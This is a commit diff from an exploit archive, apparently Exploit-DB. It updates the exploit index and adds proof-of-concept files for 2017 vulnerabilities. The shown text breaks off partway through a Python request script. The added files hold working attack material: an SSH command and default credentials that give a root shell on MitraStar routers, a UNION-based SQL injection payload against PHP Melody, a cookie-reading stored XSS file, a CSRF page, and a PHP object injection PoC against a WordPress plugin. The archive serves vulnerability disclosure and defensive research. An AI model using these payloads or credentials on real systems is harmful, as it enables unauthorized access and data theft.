DB: 2017-10-31
43 new exploits Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service SGI IRIX 6.3 Systour and OutOfBox - Exploit SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free Novell eDirectory 9.0 - DHost Remote Buffer Overflow Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB) Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB) Opera 9.61 - opera:historysearch Code Execution (PoC) Opera 9.61 - 'opera:historysearch' Code Execution (PoC) Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal Microsoft Windows 95/WfW - smbclient Directory Traversal Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal RSA Authentication Agent for Web 5.3 - Open Redirection RSA Authentication Agent for Web 5.3 - Open Redirection Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection HP System Management Homepage - 'RedirectUrl' Open Redirection HP System Management Homepage - 'RedirectUrl' Open Redirection FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities Tkai's Shoutbox - 'Query' Open Redirection Tkai's Shoutbox - 'Query' Open Redirection SAP Web Application Server 6.x/7.0 - Open Redirection SAP Web Application Server 6.x/7.0 - Open Redirection UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection Autonomy Ultraseek - 'cs.html' Open Redirection Autonomy Ultraseek - 'cs.html' Open Redirection Joomla! Component com_user - 'view' Open Redirection Joomla! Component com_user - 'view' Open Redirection MBoard 1.3 - 'url' Open Redirection MBoard 1.3 - 'url' Open Redirection Sitecore CMS 6.4.1 - 'url' Open Redirection Sitecore CMS 6.4.1 - 'url' Open Redirection Orchard 1.3.9 - 'ReturnUrl' Open Redirection Orchard 1.3.9 - 'ReturnUrl' Open Redirection Tiki Wiki CMS Groupware - 'url' Open Redirection Tiki Wiki CMS Groupware - 'url' Open Redirection WebsitePanel - 'ReturnUrl' Open Redirection WebsitePanel - 'ReturnUrl' Open Redirection ocPortal 7.1.5 - 'redirect' Open Redirection ocPortal 7.1.5 - 'redirect' Open Redirection Silverstripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS 2.4.x - 'BackURL' Open Redirection PHP Melody 2.6.1 - SQL Injection PHPMyFAQ 2.9.8 - Cross-Site Scripting (3) phpMyFAQ 2.9.8 - Cross-Site Request Forgery WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection Zomato Clone Script - 'resid' SQL Injection Website Broker Script - 'status_id' SQL Injection Vastal I-Tech Agent Zone - SQL Injection Php Inventory - Arbitrary File Upload Online Exam Test Application - 'sort' SQL Injection Nice PHP FAQ Script - 'nice_theme' SQL Injection Fake Magazine Cover Script - SQL Injection CPA Lead Reward Script - SQL Injection Basic B2B Script - SQL Injection CmsLite 1.4 - 'S' SQL Injection MyMagazine 1.0 - 'id' SQL Injection News 1.0 - SQL Injection Newspaper 1.0 - SQL Injection US Zip Codes Database - 'state' SQL Injection Shareet - 'photo' SQL Injection AROX School ERP PHP Script - 'id' SQL Injection Protected Links - SQL Injection ZeeBuddy 2x - 'groupid' SQL Injection Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection tPanel 2009 - Authentication Bypass Sokial Social Network Script 1.0 - SQL Injection SoftDatepro Dating Social Network 1.3 - SQL Injection Same Sex Dating Software Pro 1.0 - SQL Injection PHP CityPortal 2.0 - SQL Injection PG All Share Video 1.0 - SQL Injection MyBuilder Clone 1.0 - 'subcategory' SQL Injection Mailing List Manager Pro 3.0 - SQL Injection Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection Job Board Script - 'nice_theme' SQL Injection iTech Gigs Script 1.21 - SQL Injection iStock Management System 1.0 - Arbitrary File Upload iProject Management System 1.0 - 'ID' SQL Injection Article Directory Script 3.0 - 'id' SQL Injection Adult Script Pro 2.2.4 - SQL Injection D-Park Pro 1.0 - SQL Injection Ingenious 2.3.0 - Arbitrary File Upload Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure
This commit is contained in:
parent
9352001fe6
commit
33cc894818
45 changed files with 1815 additions and 28 deletions
55
files.csv
55
files.csv
|
@ -3674,7 +3674,7 @@ id,file,description,date,author,platform,type,port
|
|||
28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos,0
|
||||
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
|
||||
40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
|
||||
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
|
||||
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
|
||||
28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos,0
|
||||
28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,linux,dos,0
|
||||
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0
|
||||
|
@ -7448,7 +7448,7 @@ id,file,description,date,author,platform,type,port
|
|||
19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0
|
||||
19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0
|
||||
19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0
|
||||
19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox - Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
|
||||
19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
|
||||
19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0
|
||||
19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0
|
||||
19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0
|
||||
|
@ -9841,7 +9841,7 @@ id,file,description,date,author,platform,type,port
|
|||
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
|
||||
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
|
||||
2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
|
||||
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
|
||||
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
|
||||
2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
|
||||
2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
|
||||
2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049
|
||||
|
@ -10365,7 +10365,7 @@ id,file,description,date,author,platform,type,port
|
|||
6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0
|
||||
6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote,0
|
||||
6878,platforms/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow",2008-10-30,"Shahriyar Jalayeri",windows,remote,0
|
||||
6880,platforms/windows/remote/6880.html,"Opera 9.61 - opera:historysearch Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
|
||||
6880,platforms/windows/remote/6880.html,"Opera 9.61 - 'opera:historysearch' Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
|
||||
6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote,0
|
||||
6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0
|
||||
6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,windows,remote,0
|
||||
|
@ -10942,7 +10942,7 @@ id,file,description,date,author,platform,type,port
|
|||
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0
|
||||
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
|
||||
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
|
||||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
|
@ -12305,7 +12305,7 @@ id,file,description,date,author,platform,type,port
|
|||
20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0
|
||||
20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
|
||||
20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0
|
||||
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
|
||||
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
|
||||
20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0
|
||||
20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
|
||||
20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
|
||||
|
@ -15930,6 +15930,7 @@ id,file,description,date,author,platform,type,port
|
|||
43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
|
||||
43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0
|
||||
43059,platforms/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
|
||||
43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -38754,3 +38755,45 @@ id,file,description,date,author,platform,type,port
|
|||
43052,platforms/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps,0
|
||||
43053,platforms/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
|
||||
43054,platforms/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
|
||||
43062,platforms/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",php,webapps,0
|
||||
43063,platforms/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",php,webapps,0
|
||||
43064,platforms/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",php,webapps,0
|
||||
43065,platforms/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,php,webapps,0
|
||||
43066,platforms/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43067,platforms/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43068,platforms/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43069,platforms/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43070,platforms/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43071,platforms/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43072,platforms/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43073,platforms/php/webapps/43073.txt,"CPA Lead Reward Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43074,platforms/php/webapps/43074.txt,"Basic B2B Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43075,platforms/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43076,platforms/php/webapps/43076.txt,"MyMagazine 1.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43077,platforms/php/webapps/43077.txt,"News 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43078,platforms/php/webapps/43078.txt,"Newspaper 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43079,platforms/php/webapps/43079.txt,"US Zip Codes Database - 'state' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43080,platforms/php/webapps/43080.txt,"Shareet - 'photo' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43081,platforms/php/webapps/43081.txt,"AROX School ERP PHP Script - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43082,platforms/php/webapps/43082.txt,"Protected Links - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43083,platforms/php/webapps/43083.txt,"ZeeBuddy 2x - 'groupid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43084,platforms/php/webapps/43084.txt,"Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43085,platforms/php/webapps/43085.txt,"tPanel 2009 - Authentication Bypass",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43086,platforms/php/webapps/43086.txt,"Sokial Social Network Script 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43087,platforms/php/webapps/43087.txt,"SoftDatepro Dating Social Network 1.3 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43088,platforms/php/webapps/43088.txt,"Same Sex Dating Software Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43089,platforms/php/webapps/43089.txt,"PHP CityPortal 2.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43090,platforms/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43091,platforms/php/webapps/43091.txt,"MyBuilder Clone 1.0 - 'subcategory' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43092,platforms/php/webapps/43092.txt,"Mailing List Manager Pro 3.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43093,platforms/php/webapps/43093.txt,"Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43094,platforms/php/webapps/43094.txt,"Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43095,platforms/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43096,platforms/php/webapps/43096.txt,"iTech Gigs Script 1.21 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43097,platforms/php/webapps/43097.txt,"iStock Management System 1.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43098,platforms/php/webapps/43098.txt,"iProject Management System 1.0 - 'ID' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43099,platforms/php/webapps/43099.txt,"Article Directory Script 3.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43100,platforms/php/webapps/43100.txt,"Adult Script Pro 2.2.4 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43101,platforms/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43102,platforms/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43103,platforms/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
27
platforms/hardware/remote/43061.txt
Executable file
27
platforms/hardware/remote/43061.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Privilege escalation MitraStar routers
|
||||
# Date: 28-10-2017
|
||||
# Exploit Author: j0lama
|
||||
# Vendor Homepage: http://www.mitrastar.com/
|
||||
# Provider Homepage: https://www.movistar.com/
|
||||
# Models affected: MitraStar DSL-100HN-T1 and MitraStar GPT-2541GNAC (HGU)
|
||||
# Software versions: ES_113WJY0b16 (DSL-100HN-T1) and 1.00(VNJ0)b1 (GPT-2541GNAC)
|
||||
# Vulnerability analysis: http://jolama.es/temas/router-attack/index.php
|
||||
|
||||
Description
|
||||
-----------
|
||||
SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us.
|
||||
|
||||
$ ssh 1234@ip /bin/sh
|
||||
|
||||
This give us a shell with root permissions.
|
||||
|
||||
Note: the password for 1234 user is under the router.
|
||||
|
||||
You can copy all file system to your local machine using scp.
|
||||
In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root).
|
||||
|
||||
|
||||
Solution
|
||||
--------
|
||||
In the latest firmware versions this have been fixed.
|
||||
If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before.
|
18
platforms/php/webapps/43062.txt
Executable file
18
platforms/php/webapps/43062.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
###################################################
|
||||
[+] Author : Venkat Rajgor
|
||||
[+] Email : Venki9990@gmail.com
|
||||
[+] Vulnerability : SQL injection
|
||||
###################################################
|
||||
E-mail ID : support@phpsugar.com
|
||||
Download : http://www.phpsugar.com
|
||||
Web : http://www.phpsugar.com
|
||||
Price : $39 USD
|
||||
###################################################
|
||||
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
|
||||
Application : PHPSUGAR PHP Melody version 2.6.1
|
||||
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
|
||||
###################################################
|
||||
|
||||
Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
|
||||
|
||||
Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -
|
41
platforms/php/webapps/43063.txt
Executable file
41
platforms/php/webapps/43063.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability
|
||||
# Date: 28-9-2017
|
||||
# Exploit Author: Nikhil Mittal (Payatu Labs)
|
||||
# Vendor Homepage: http://www.phpmyfaq.de/
|
||||
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
|
||||
# Version: 2.9.8
|
||||
# Tested on: MAC OS
|
||||
# CVE : 2017-15727
|
||||
|
||||
1. Description
|
||||
|
||||
In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.
|
||||
|
||||
2. Proof of concept
|
||||
|
||||
Exploit code
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>XSS EXPLOIT</title>
|
||||
</head>
|
||||
<body>
|
||||
<script>confirm(document.cookie)</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
Steps to reproduce:
|
||||
|
||||
1. Create a user having limited access rights to attachment section
|
||||
2. Goto http://localhost/phpmyfaq/admin/?action=editentry
|
||||
2. Upload the exploit code with .html extension at the place of attachements
|
||||
3. Access the file url generated at /phpmyfaq/attachments/<random_path>
|
||||
4. Reach to last file using directory traversal and XSS will triage
|
||||
|
||||
3. Solution
|
||||
|
||||
Update to phpMyFAQ Version 2.9.9
|
||||
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip
|
29
platforms/php/webapps/43064.txt
Executable file
29
platforms/php/webapps/43064.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: phpMyFAQ 2.9.8 CSRF Vulnerability
|
||||
# Date: 27-9-2017
|
||||
# Exploit Author: Nikhil Mittal (Payatu Labs)
|
||||
# Vendor Homepage: http://www.phpmyfaq.de/
|
||||
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
|
||||
# Version: 2.9.8
|
||||
# Tested on: MAC OS
|
||||
# CVE : 2017-15730
|
||||
|
||||
1. Description
|
||||
|
||||
In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php.
|
||||
|
||||
2. Proof of concept
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>PHPMYSQL CSRF EXPLOIT</title>
|
||||
</head>
|
||||
<body>
|
||||
<a href="http://127.0.0.1/phpmyfaq/admin/?action=clear-statistics">EXPLOIT!</a>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
3. Solution
|
||||
|
||||
Update to phpMyFAQ Version 2.9.9
|
||||
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip
|
66
platforms/php/webapps/43065.py
Executable file
66
platforms/php/webapps/43065.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
|
||||
# Google Dork: [NA]
|
||||
# Date: [Okt 30 2017]
|
||||
# Exploit Author: [tomplixsee]
|
||||
# Author blog : [cupuzone.wordpress.com]
|
||||
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
|
||||
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
|
||||
# Version: [<= 4.2.24]
|
||||
# Tested on: [Ubuntu Server 16.04]
|
||||
# CVE : [NA]
|
||||
|
||||
tested on app version 4.2.23, 4.2.24
|
||||
|
||||
we can send an evil cookie (login not required) to vulnerable function
|
||||
1. vulnerable code on Functions/Process_Ajax.php <= tested
|
||||
|
||||
203 // Adds an item to the plugin's cart
|
||||
204 function UPCP_Add_To_Cart() {
|
||||
205 global $woocommerce;
|
||||
206 global $wpdb;
|
||||
207 global $items_table_name;
|
||||
208
|
||||
209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
|
||||
210
|
||||
211 if ($WooCommerce_Checkout == "Yes") {
|
||||
212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
|
||||
213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
|
||||
214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
|
||||
215 }
|
||||
216
|
||||
217 if (isset($_COOKIE['upcp_cart_products'])) {
|
||||
218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
|
||||
219 }
|
||||
220 else {
|
||||
221 $Products_Array = array();
|
||||
222 }
|
||||
223
|
||||
224 $Products_Array[] = $_POST['prod_ID'];
|
||||
225 $Products_Array = array_unique($Products_Array);
|
||||
226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
|
||||
227 }
|
||||
228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
|
||||
229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
|
||||
|
||||
2. vulnerable code on Functions/Shortcodes.php <= not tested
|
||||
|
||||
POC
|
||||
1. use a WP plugin to test php object injection,
|
||||
like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
|
||||
|
||||
2. make a request
|
||||
#-----------------------------------
|
||||
#! /usr/bin/python
|
||||
import requests
|
||||
url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
|
||||
data = {'action':'upcp_add_to_cart'}
|
||||
headers = {
|
||||
'Content-type': 'application/x-www-form-urlencoded',
|
||||
